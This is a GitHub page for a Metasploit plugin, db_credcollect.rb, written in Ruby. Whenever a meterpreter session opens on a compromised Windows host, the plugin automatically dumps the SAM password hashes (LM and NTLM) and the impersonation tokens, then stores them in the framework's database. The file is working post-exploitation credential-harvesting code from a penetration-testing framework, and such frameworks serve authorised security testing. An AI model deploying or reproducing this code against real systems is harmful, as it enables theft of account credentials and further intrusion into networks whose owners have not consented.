-
Notifications
You must be signed in to change notification settings - Fork 14.1k
/
Copy pathdb_credcollect.rb
118 lines (91 loc) · 2.66 KB
/
db_credcollect.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
#
# $Id$
#
# credcollect - tebo[at]attackresearch.com
#
# $Revision$
#
module Msf
class Plugin::CredCollect < Msf::Plugin
include Msf::SessionEvent
class CredCollectCommandDispatcher
include Msf::Ui::Console::CommandDispatcher
def name
"credcollect"
end
def commands
{
"db_hashes" => "Dumps hashes (deprecated: use 'creds -s smb')",
"db_tokens" => "Dumps tokens (deprecated: use 'notes -t smb_token')"
}
end
def cmd_db_hashes()
print_error ""
print_error "db_hashes is deprecated. Use 'creds -s smb' instead."
print_error ""
end
def cmd_db_tokens()
print_error ""
print_error "db_tokens is deprecated. Use 'notes -t smb_token' instead."
print_error ""
end
end
def on_session_open(session)
return if not self.framework.db.active
print_status("This is CredCollect, I have the conn!")
if (session.type == "meterpreter")
# Make sure we're rockin Priv and Incognito
session.core.use("priv")
session.core.use("incognito")
# It wasn't me mom! Stinko did it!
hashes = session.priv.sam_hashes
# Target infos for the db record
addr = session.sock.peerhost
# This ought to read from the exploit's datastore.
# Use the meterpreter script if you need to control it.
smb_port = 445
# Record hashes to the running db instance
hashes.each do |hash|
data = {}
data[:host] = addr
data[:port] = smb_port
data[:sname] = 'smb'
data[:user] = hash.user_name
data[:pass] = hash.lanman + ":" + hash.ntlm
data[:type] = "smb_hash"
data[:active] = true
self.framework.db.report_auth_info(data)
end
# Record user tokens
tokens = session.incognito.incognito_list_tokens(0).values
# Meh, tokens come to us as a formatted string
tokens = tokens.join.strip!.split("\n")
tokens.each do |token|
data = {}
data[:host] = addr
data[:type] = 'smb_token'
data[:data] = token
data[:update] = :unique_data
self.framework.db.report_note(data)
end
end
end
def on_session_close(session,reason='')
end
def initialize(framework, opts)
super
self.framework.events.add_session_subscriber(self)
add_console_dispatcher(CredCollectCommandDispatcher)
end
def cleanup
self.framework.events.remove_session_subscriber(self)
remove_console_dispatcher('credcollect')
end
def name
"db_credcollect"
end
def desc
"Automatically grabs hashes and tokens from meterpreter session events and stores them in the db"
end
end
end